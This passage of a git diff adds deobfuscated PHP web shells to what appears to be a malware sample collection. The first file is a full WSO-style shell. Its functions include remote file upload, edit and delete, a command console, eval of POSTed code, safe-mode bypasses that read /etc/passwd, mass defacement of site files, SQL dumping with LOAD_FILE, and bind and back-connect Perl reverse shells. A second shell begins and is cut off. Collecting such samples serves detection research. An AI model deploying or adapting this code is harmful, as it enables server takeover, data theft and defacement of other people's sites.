'; + if (!empty($_POST['p1'])) { + switch ($_POST['p1']) { + case 'uploadFile': + if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; + break; + case 'mkdir': + if (!@mkdir($_POST['p2'])) echo "Can't create new dir"; + break; + case 'delete': + function deleteDir($path) { + $path = (substr($path, -1) == '/') ? $path : $path . '/'; + $dh = opendir($path); + while (($item = readdir($dh)) !== false) { + $item = $path . $item; + if ((basename($item) == "..") || (basename($item) == ".")) continue; + $type = filetype($item); + if ($type == "dir") deleteDir($item); + else @unlink($item); + } + closedir($dh); + rmdir($path); + } + if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) { + $f = urldecode($f); + if (is_dir($f)) deleteDir($f); + else @unlink($f); + } + break; + case 'paste': + if ($_SESSION['act'] == 'copy') { + function copy_paste($c, $s, $d) { + if (is_dir($c . $s)) { + mkdir($d . $s); + $h = @opendir($c . $s); + while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) { + copy_paste($c . $s . '/', $f, $d . $s . '/'); + } + } elseif (is_file($c . $s)) { + @copy($c . $s, $d . $s); + } + } + foreach ($_SESSION['f'] as $f) copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']); + } elseif ($_SESSION['act'] == 'move') { + function move_paste($c, $s, $d) { + if (is_dir($c . $s)) { + mkdir($d . $s); + $h = @opendir($c . $s); + while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) { + copy_paste($c . $s . '/', $f, $d . $s . '/'); + } + } elseif (@is_file($c . $s)) { + @copy($c . $s, $d . $s); + } + } + foreach ($_SESSION['f'] as $f) @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f); + } elseif ($_SESSION['act'] == 'zip') { + if (class_exists('ZipArchive')) { + $zip = new ZipArchive(); + if ($zip->open('wso_' . date("Ymd_His") . '.zip', (int)eval('return ZIPARCHIVE::CREATE;'))) { + chdir($_SESSION['c']); + foreach ($_SESSION['f'] as $f) { + if (@is_file($_SESSION['c'] . 
$f)) $zip->addFile($_SESSION['c'] . $f, $f); + elseif (@is_dir($_SESSION['c'] . $f)) { + $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/')); + foreach ($iterator as $key => $value) { + $zip->addFile(realpath($key), $key); + } + } + } + chdir($GLOBALS['cwd']); + $zip->close(); + } + } + } elseif ($_SESSION['act'] == 'unzip') { + if (class_exists('ZipArchive')) { + $zip = new ZipArchive(); + foreach ($_SESSION['f'] as $f) { + if ($zip->open($_SESSION['c'] . $f)) { + $zip->extractTo($GLOBALS['cwd']); + $zip->close(); + } + } + } + } + unset($_SESSION['f']); + break; + default: + if (!empty($_POST['p1']) && (($_POST['p1'] == 'copy') || ($_POST['p1'] == 'move') || ($_POST['p1'] == 'zip') || ($_POST['p1'] == 'unzip'))) { + $_SESSION['act'] = @$_POST['p1']; + $_SESSION['f'] = @$_POST['f']; + foreach ($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); + $_SESSION['c'] = @$_POST['c']; + } + break; + } + } + $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); + if ($dirContent === false) { + echo 'Can\'t open this folder!'; + wsoFooter(); + return; + } + global $sort; + $sort = array('name', 1); + if (!empty($_POST['p1'])) { + if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); + } + echo " + +"; + $dirs = $files = array(); + $n = count($dirContent); + for ($i = 0;$i < $n;$i++) { + $ow = @posix_getpwuid(@fileowner($dirContent[$i])); + $gr = @posix_getgrgid(@filegroup($dirContent[$i])); + $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); + if (@is_file($GLOBALS['cwd'] . 
$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); + elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link')); + elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); + } + $GLOBALS['sort'] = $sort; + function wsoCmp($a, $b) { + if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); + else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); + } + usort($files, "wsoCmp"); + usort($dirs, "wsoCmp"); + $files = array_merge($dirs, $files); + $l = 0; + foreach ($files as $f) { + echo ''; + $l = $l ? 0 : 1; + } + echo "
NameSizeModifyOwner/GroupPermissionsActions
' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');">[ ' . htmlspecialchars($f['name']) . ' ]') . '' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '' . $f['modify'] . '' . $f['owner'] . '/' . $f['group'] . '' . $f['perms'] . 'R T' . (($f['type'] == 'file') ? ' E D' : '') . '
+ + + +  
"; + wsoFooter(); + } + function actionStringTools() { + if (!function_exists('hex2bin')) { + function hex2bin($p) { + return decbin(hexdec($p)); + } + } + if (!function_exists('binhex')) { + function binhex($p) { + return dechex(bindec($p)); + } + } + if (!function_exists('hex2ascii')) { + function hex2ascii($p) { + $r = ''; + for ($i = 0;$i < strLen($p);$i+= 2) { + $r.= chr(hexdec($p[$i] . $p[$i + 1])); + } + return $r; + } + } + if (!function_exists('ascii2hex')) { + function ascii2hex($p) { + $r = ''; + for ($i = 0;$i < strlen($p);++$i) $r.= sprintf('%02X', ord($p[$i])); + return strtoupper($r); + } + } + if (!function_exists('full_urlencode')) { + function full_urlencode($p) { + $r = ''; + for ($i = 0;$i < strlen($p);++$i) $r.= '%' . dechex(ord($p[$i])); + return strtoupper($r); + } + } + $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen',); + if (isset($_POST['ajax'])) { + $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = true; + ob_start(); + if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); + $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), " + \'") . "'; +"; + echo strlen($temp), " +", $temp; + exit; + } + wsoHeader(); + echo '

String conversions

'; + if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = false; + echo "
send using AJAX
";
+                                                if (!empty($_POST['p1'])) {
+                                                    if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
+                                                }
+                                                echo "

Search text in files:

+
+ + + + +
Text:
Path:
Name:
"; + function wsoRecursiveGlob($path) { + if (substr($path, -1) != '/') $path.= '/'; + $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); + if (is_array($paths) && @count($paths)) { + foreach ($paths as $item) { + if (@is_dir($item)) { + if ($path != $item) wsoRecursiveGlob($item); + } else { + if (@strpos(@file_get_contents($item), @$_POST['p2']) !== false) echo "" . htmlspecialchars($item) . "
"; + } + } + } + } + if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']); + echo "

Search for hash:

+
+
+
+
+
+
+
+
"; + wsoFooter(); + } + function actionFilesTools() { + if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']); + if (@$_POST['p2'] == 'download') { + if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); + if (function_exists("mime_content_type")) { + $type = @mime_content_type($_POST['p1']); + header("Content-Type: " . $type); + } + $fp = @fopen($_POST['p1'], "r"); + if ($fp) { + while (!@feof($fp)) echo @fread($fp, 1024); + fclose($fp); + } + } + exit; + } + if (@$_POST['p2'] == 'mkfile') { + if (!file_exists($_POST['p1'])) { + $fp = @fopen($_POST['p1'], 'w'); + if ($fp) { + $_POST['p2'] = "edit"; + fclose($fp); + } + } + } + wsoHeader(); + echo '

File tools

';
+ if (!file_exists(@$_POST['p1'])) {
+ echo 'File not exists';
+ wsoFooter();
+ return;
+ }
+ $uid = @posix_getpwuid(@fileowner($_POST['p1']));
+ if (!$uid) {
+ $uid['name'] = @fileowner($_POST['p1']);
+ $gid['name'] = @filegroup($_POST['p1']);
+ } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
+ echo 'Name: ' . htmlspecialchars(@basename($_POST['p1'])) . ' Size: ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' Permission: ' . wsoPermsColor($_POST['p1']) . ' Owner/Group: ' . $uid['name'] . '/' . $gid['name'] . '
'; + echo 'Create time: ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' Access time: ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' Modify time: ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '

'; + if (empty($_POST['p2'])) $_POST['p2'] = 'view'; + if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); + else $m = array('Chmod', 'Rename', 'Touch'); + foreach ($m as $v) echo '' . ((strtolower($v) == @$_POST['p2']) ? '[ ' . $v . ' ]' : $v) . ' '; + echo '

'; + switch ($_POST['p2']) { + case 'view': + echo '
';
+                                                        $fp = @fopen($_POST['p1'], 'r');
+                                                        if ($fp) {
+                                                            while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
+                                                            @fclose($fp);
+                                                        }
+                                                        echo '
'; + break; + case 'highlight': + if (@is_readable($_POST['p1'])) { + echo '
'; + $code = @highlight_file($_POST['p1'], true); + echo str_replace(array(''), array(''), $code) . '
'; + } + break; + case 'chmod': + if (!empty($_POST['p3'])) { + $perms = 0; + for ($i = strlen($_POST['p3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1)); + if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; + } + clearstatcache(); + echo '
'; + break; + case 'edit': + if (!is_writable($_POST['p1'])) { + echo 'File isn\'t writeable'; + break; + } + if (!empty($_POST['p3'])) { + $time = @filemtime($_POST['p1']); + $_POST['p3'] = substr($_POST['p3'], 1); + $fp = @fopen($_POST['p1'], "w"); + if ($fp) { + @fwrite($fp, $_POST['p3']); + @fclose($fp); + echo 'Saved!
'; + @touch($_POST['p1'], $time, $time); + } + } + echo '
'; + break; + case 'hexdump': + $c = @file_get_contents($_POST['p1']); + $n = 0; + $h = array('00000000
', '', ''); + $len = strlen($c); + for ($i = 0;$i < $len;++$i) { + $h[1].= sprintf('%02X', ord($c[$i])) . ' '; + switch (ord($c[$i])) { + case 0: + $h[2].= ' '; + break; + case 9: + $h[2].= ' '; + break; + case 10: + $h[2].= ' '; + break; + case 13: + $h[2].= ' '; + break; + default: + $h[2].= $c[$i]; + break; + } + $n++; + if ($n == 32) { + $n = 0; + if ($i + 1 < $len) { + $h[0].= sprintf('%08X', $i + 1) . '
'; + } + $h[1].= '
'; + $h[2].= " +"; + } + } + echo '
' . $h[0] . '
' . $h[1] . '
' . htmlspecialchars($h[2]) . '
'; + break; + case 'rename': + if (!empty($_POST['p3'])) { + if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; + else die(''); + } + echo '
'; + break; + case 'touch': + if (!empty($_POST['p3'])) { + $time = strtotime($_POST['p3']); + if ($time) { + if (!touch($_POST['p1'], $time, $time)) echo 'Fail!'; + else echo 'Touched!'; + } else echo 'Bad time format!'; + } + clearstatcache(); + echo '
'; + break; + } + echo '
'; + wsoFooter(); + } + function actionSafeMode() { + $temp = ''; + ob_start(); + switch ($_POST['p1']) { + case 1: + $temp = @tempnam($test, 'cx'); + if (@copy("compress.zlib://" . $_POST['p2'], $temp)) { + echo @file_get_contents($temp); + unlink($temp); + } else echo 'Sorry... Can\'t open file'; + break; + case 2: + $files = glob($_POST['p2'] . '*'); + if (is_array($files)) foreach ($files as $filename) echo $filename . " +"; + break; + case 3: + $ch = curl_init("file://" . $_POST['p2'] . "" . preg_replace('!\(\d+\)\s.*!', '', __FILE__)); + curl_exec($ch); + break; + case 4: + ini_restore("safe_mode"); + ini_restore("open_basedir"); + include ($_POST['p2']); + break; + case 5: + for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { + $uid = @posix_getpwuid($_POST['p2']); + if ($uid) echo join(':', $uid) . " +"; + } + break; + } + $temp = ob_get_clean(); + wsoHeader(); + echo '

Safe mode bypass

'; + echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To
'; + if ($temp) echo '
' . htmlspecialchars($temp) . '
'; + echo '
'; + wsoFooter(); + } + function actionConsole() { + if (isset($_POST['ajax'])) { + $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = true; + ob_start(); + echo "document.cf.cmd.value=''; +"; + $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes(" +$ " . $_POST['p1'] . " +" . wsoEx($_POST['p1']), " + \'")); + if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) { + if (@chdir($match[1])) { + $GLOBALS['cwd'] = @getcwd(); + echo "document.mf.c.value='" . $GLOBALS['cwd'] . "';"; + } + } + echo "document.cf.output.value+='" . $temp . "';"; + echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; + $temp = ob_get_clean(); + echo strlen($temp), " +", $temp; + exit; + } + wsoHeader(); + echo ""; + echo '

Console

send using AJAX
'; + echo '
'; + wsoFooter(); + } + function actionSelfRemove() { + if ($_POST['p1'] == 'yes') if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); + else echo 'unlink error!'; + if ($_POST['p1'] != 'yes') wsoHeader(); + echo '

Suicide

Really want to remove the shell?
Yes
'; + wsoFooter(); + } + //** updates + function clear_fill($filo, $index) { + if (file_exists($filo)) { + $handle = fopen($filo, 'w'); + fwrite($handle, ''); + fwrite($handle, $index); + fclose($handle); + } + } + ///////// + function do_it() { + global $dir, $index; + chdir($dir); + $me = str_replace(dirname(__FILE__) . '/', '', __FILE__); + $filos = scandir($dir); + $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", "."); + sort($filos); + $n = 0; + echo "
"; + echo "
"; + echo "

$n File Detected


"; + } + ////////////////////////////// + function ListFiles($dirall) { + if ($dh = opendir($dirall)) { + $filos = Array(); + $inner_files = Array(); + $me = str_replace(dirname(__FILE__) . '/', '', __FILE__); + $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db"); + while ($filo = readdir($dh)) { + if ($filo != "." && $filo != ".." && $filo[0] != '.' && !in_array($filo, $notallow)) { + if (is_dir($dirall . "/" . $filo)) { + $inner_files = ListFiles($dirall . "/" . $filo); + if (is_array($inner_files)) $filos = array_merge($filos, $inner_files); + } else { + array_push($filos, $dirall . "/" . $filo); + } + } + } + closedir($dh); + return $filos; + } + } + ////////////////////////////////////////// + function do_it_all() { + global $index; + $dirall = $_POST['dir']; + echo "
"; + $key = $key + 1; + echo "

$key File Detected


"; + } + //////// + function actionMass() { + wsoHeader(); + echo "

Mass Defeace All Files

+

+ Index Code Here :
+

+ Main Dir : + | Options : + +
"; + if (isset($_POST['p1'])) { + if ($_POST['indexit']) { + if ($_POST['option'] == "Only for Selected Folder") { + do_it(); + } elseif ($_POST['option'] == "For all Sub Folders") { + do_it_all(); + } else { + echo "Please select one option to work on it !!"; + } + } + } + wsoFooter(); + } + function actionDomain() { + wsoHeader(); + echo "

Get All Server Domains

"; + $d0mains = @file("/etc/named.conf"); + if (!$d0mains) { + echo "
Can't ReaD -> [/etc/named.conf]"; + } else { + echo " +"; + foreach ($d0mains as $d0main) { + if (eregi("zone", $d0main)) { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + if (strlen(trim($domains[1][0])) > 2) { + $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); + echo ""; + flush(); + } + } + } + echo "
DomainUser
" . $domains[1][0] . "" . $user['name'] . "
+

"; + } + wsoFooter(); + } + function actionSql() { + class DbClass { + var $type; + var $link; + var $res; + function DbClass($type) { + $this->type = $type; + } + function connect($host, $user, $pass, $dbname) { + switch ($this->type) { + case 'mysql': + if ($this->link = @mysql_connect($host, $user, $pass, true)) return true; + break; + case 'pgsql': + $host = explode(':', $host); + if (!$host[1]) $host[1] = 5432; + if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true; + break; + } + return false; + } + function selectdb($db) { + switch ($this->type) { + case 'mysql': + if (@mysql_select_db($db)) return true; + break; + } + return false; + } + function query($str) { + switch ($this->type) { + case 'mysql': + return $this->res = @mysql_query($str); + break; + case 'pgsql': + return $this->res = @pg_query($this->link, $str); + break; + } + return false; + } + function fetch() { + $res = func_num_args() ? func_get_arg(0) : $this->res; + switch ($this->type) { + case 'mysql': + return @mysql_fetch_assoc($res); + break; + case 'pgsql': + return @pg_fetch_assoc($res); + break; + } + return false; + } + function listDbs() { + switch ($this->type) { + case 'mysql': + return $this->res = @mysql_list_dbs($this->link); + break; + case 'pgsql': + return $this->res = $this->query("SELECT datname FROM pg_database"); + break; + } + return false; + } + function listTables() { + switch ($this->type) { + case 'mysql': + return $this->res = $this->query('SHOW TABLES'); + break; + case 'pgsql': + return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_shadow'"); + break; + } + return false; + } + function error() { + switch ($this->type) { + case 'mysql': + return @mysql_error($this->link); + break; + case 'pgsql': + return @pg_last_error($this->link); + break; + } + return false; + } + function 
setCharset($str) { + switch ($this->type) { + case 'mysql': + if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); + else $this->query('SET CHARSET ' . $str); + break; + case 'pgsql': + return @pg_set_client_encoding($this->link, $str); + break; + } + return false; + } + function loadFile($str) { + switch ($this->type) { + case 'mysql': + return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); + break; + case 'pgsql': + $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); + $r = array(); + while ($i = $this->fetch()) $r[] = $i['file']; + $this->query('drop table wso2'); + return array('file' => implode(" +", $r)); + break; + } + return false; + } + function dump($table) { + switch ($this->type) { + case 'mysql': + $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); + $create = mysql_fetch_array($res); + echo $create[1] . "; + +"; + $this->query('SELECT * FROM `' . $table . '`'); + while ($item = $this->fetch()) { + $columns = array(); + foreach ($item as $k => $v) { + $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; + $columns[] = "`" . $k . "`"; + } + echo 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . " +"; + } + break; + case 'pgsql': + $this->query('SELECT * FROM ' . $table); + while ($item = $this->fetch()) { + $columns = array(); + foreach ($item as $k => $v) { + $item[$k] = "'" . addslashes($v) . "'"; + $columns[] = $k; + } + echo 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . 
" +"; + } + break; + } + return false; + } + }; + $db = new DbClass($_POST['type']); + if (@$_POST['p2'] == 'download') { + ob_start("ob_gzhandler", 4096); + $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); + $db->selectdb($_POST['sql_base']); + header("Content-Disposition: attachment; filename=dump.sql"); + header("Content-Type: text/plain"); + foreach ($_POST['tbl'] as $v) $db->dump($v); + exit; + } + wsoHeader(); + echo " +

Sql browser

+
+ + + + + + + + +
TypeHostLoginPasswordDatabase
"; + $tmp = ""; + if (isset($_POST['sql_host'])) { + if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { + switch ($_POST['charset']) { + case "Windows-1251": + $db->setCharset('cp1251'); + break; + case "UTF-8": + $db->setCharset('utf8'); + break; + case "KOI8-R": + $db->setCharset('koi8r'); + break; + case "KOI8-U": + $db->setCharset('koi8u'); + break; + case "cp866": + $db->setCharset('cp866'); + break; + } + $db->listDbs(); + echo "'; + } else echo $tmp; + } else echo $tmp; + echo "
+ "; + if (isset($db) && $db->link) { + echo "
"; + if (!empty($_POST['sql_base'])) { + $db->selectdb($_POST['sql_base']); + echo ""; + } + echo "
Tables:

"; + $tbls_res = $db->listTables(); + while ($item = $db->fetch($tbls_res)) { + list($key, $value) = each($item); + $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); + $value = htmlspecialchars($value); + echo " " . $value . " (" . $n['n'] . ")
"; + } + echo "
"; + if (@$_POST['p1'] == 'select') { + $_POST['p1'] = 'query'; + $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2'] . ''); + $num = $db->fetch(); + $num = $num['n']; + echo "" . $_POST['p2'] . " ($num) "; + for ($i = 0;$i < ($num / 30);$i++) if ($i != (int)$_POST['p3']) echo "", ($i + 1), " "; + else echo ($i + 1), " "; + if ($_POST['type'] == 'pgsql') $_POST['p3'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30); + else $_POST['p3'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30'; + echo "

"; + } + if ((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { + $db->query(@$_POST['p3']); + if ($db->res !== false) { + $title = false; + echo ''; + $line = 1; + while ($item = $db->fetch()) { + if (!$title) { + echo ''; + foreach ($item as $key => $value) echo ''; + reset($item); + $title = true; + echo ''; + $line = 2; + } + echo ''; + $line = $line == 1 ? 2 : 1; + foreach ($item as $key => $value) { + if ($value == null) echo ''; + else echo ''; + } + echo ''; + } + echo '
' . $key . '
null' . nl2br(htmlspecialchars($value)) . '
'; + } else { + echo '
Error: ' . htmlspecialchars($db->error()) . '
'; + } + } + echo "

"; + echo "

Load file
"; + if (@$_POST['p1'] == 'loadfile') { + $file = $db->loadFile($_POST['p2']); + echo '
' . htmlspecialchars($file['file']) . '
'; + } + } + echo '
'; + wsoFooter(); + } + function actionNetwork() { + wsoHeader(); + $back_connect_p = "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"; + $bind_port_p = "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"; + echo "

Network tools

+
+ Bind port to /bin/sh [perl]
+ Port: +
+
+ Back-connect [perl]
+ Server: Port: +

"; + if (isset($_POST['p1'])) { + function cf($f, $t) { + $w = @fopen($f, "w") or @function_exists('file_put_contents'); + if ($w) { + @fwrite($w, base64_decode($t)); + @fclose($w); + } + } + if ($_POST['p1'] == 'bpp') { + cf("/tmp/bp.pl", $bind_port_p); + $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); + echo "
$out
+" . wsoEx("ps aux | grep bp.pl") . "
"; + } + if ($_POST['p1'] == 'bcp') { + cf("/tmp/bc.pl", $back_connect_p); + $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); + echo "
$out
+" . wsoEx("ps aux | grep bc.pl") . "
"; + } + } + echo '
';
+ wsoFooter();
+ }
+ function actionRC() {
+ if (!@$_POST['p1']) {
+ $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => VERSION, "safemode" => @ini_get('safe_mode'));
+ echo serialize($a);
+ } else {
+ eval($_POST['p1']);
+ }
+ }
+ if (empty($_POST['a'])) if (isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action;
+ else $_POST['a'] = 'SecInfo';
+ if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
+ exit;
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php b/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php
new file mode 100644
index 0000000..7f62a2d
--- /dev/null
+++ b/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php
@@ -0,0 +1,1066 @@ +$v) { + if(!preg_match("/^\./", $v)) { + if(is_dir($dir . DS . $v) || !$dirs_only) { + if(!$writable || is_writeable($dir . DS . $v)) { + $content[] = $dir . DS . $v ; + } + } + } + if(!preg_match("/^\./", $v) && is_dir($dir . DS . $v)) { + if($maxdepth > 0) { + $__content = scandir_rec($dir . DS . $v, $dirs_only, $maxdepth-1, $writable, true) ; + if($__content) { + foreach($__content as $kk=>$vv) { + if(is_dir($dir . DS . $v) || !$dirs_only) { + if(!$writable || is_writeable($dir . DS . $vv)) { + $content[] = $vv ; + } + } + } + } + } + } + } + } + return $content ; +} + +function cust_function_exists($function) { + $disabled = explode(', ', ini_get('disable_functions')); + return !in_array($function, $disabled) && function_exists($function); +} + +function deleteDir($path) { + $path = (substr($path,-1)=='/') ? $path:$path.'/'; + $dh = opendir($path); + while ( ($item = readdir($dh) ) !== false) { + $item = $path.$item; + if ( (basename($item) == "..") || (basename($item) == ".") ) + continue; + if (is_dir($item)) { + deleteDir($item); + } elseif(is_file($item)) { + @unlink($item); + } + } + closedir($dh); + @rmdir($path); +} + +function smartCopy($source, $dest, $options=array('folderPermission'=>0777,'filePermission'=>0777)) { + $result=false; + + if (is_file($source)) { + if ($dest[strlen($dest)-1]=='/') { + if (!file_exists($dest)) { + cmfcDirectory::makeAll($dest,$options['folderPermission'],true); + } + $__dest=$dest."/".basename($source); + } else { + $__dest=$dest; + } + $result=copy($source, $__dest); + chmod($__dest,$options['filePermission']); + + } elseif(is_dir($source)) { + if ($dest[strlen($dest)-1]=='/') { + if ($source[strlen($source)-1]=='/') { + //Copy only contents + } else { + //Change parent itself and its contents + $dest=$dest.basename($source); + @mkdir($dest); + chmod($dest,$options['filePermission']); + } + } else { + if ($source[strlen($source)-1]=='/') { + //Copy parent directory with new name and all its content + 
@mkdir($dest,$options['folderPermission']); + chmod($dest,$options['filePermission']); + } else { + //Copy parent directory with new name and all its content + @mkdir($dest,$options['folderPermission']); + chmod($dest,$options['filePermission']); + } + } + + $dirHandle=opendir($source); + while($file=readdir($dirHandle)) + { + if($file!="." && $file!="..") + { + if(!is_dir($source."/".$file)) { + $__dest=$dest."/".$file; + } else { + $__dest=$dest."/".$file; + } + //echo "$source/$file ||| $__dest
"; + $result=smartCopy($source."/".$file, $__dest, $options); + } + } + closedir($dirHandle); + + } else { + $result=false; + } + return $result; + } + +class archive +{ + function archive($name) + { + $this->options = array ( + 'basedir' => ".", + 'name' => $name, + 'prepend' => "", + 'inmemory' => 0, + 'overwrite' => 0, + 'recurse' => 1, + 'storepaths' => 1, + 'followlinks' => 0, + 'level' => 3, + 'method' => 1, + 'sfx' => "", + 'type' => "", + 'comment' => "" + ); + $this->files = array (); + $this->exclude = array (); + $this->storeonly = array (); + $this->error = array (); + } + + function set_options($options) + { + foreach ($options as $key => $value) + $this->options[$key] = $value; + if (!empty ($this->options['basedir'])) + { + $this->options['basedir'] = str_replace("\\", "/", $this->options['basedir']); + $this->options['basedir'] = preg_replace("/\/+/", "/", $this->options['basedir']); + $this->options['basedir'] = preg_replace("/\/$/", "", $this->options['basedir']); + } + if (!empty ($this->options['name'])) + { + $this->options['name'] = str_replace("\\", "/", $this->options['name']); + $this->options['name'] = preg_replace("/\/+/", "/", $this->options['name']); + } + if (!empty ($this->options['prepend'])) + { + $this->options['prepend'] = str_replace("\\", "/", $this->options['prepend']); + $this->options['prepend'] = preg_replace("/^(\.*\/+)+/", "", $this->options['prepend']); + $this->options['prepend'] = preg_replace("/\/+/", "/", $this->options['prepend']); + $this->options['prepend'] = preg_replace("/\/$/", "", $this->options['prepend']) . "/"; + } + } + + function create_archive() + { + $this->make_list(); + + if ($this->options['inmemory'] == 0) + { + $pwd = getcwd(); + chdir($this->options['basedir']); + if ($this->options['overwrite'] 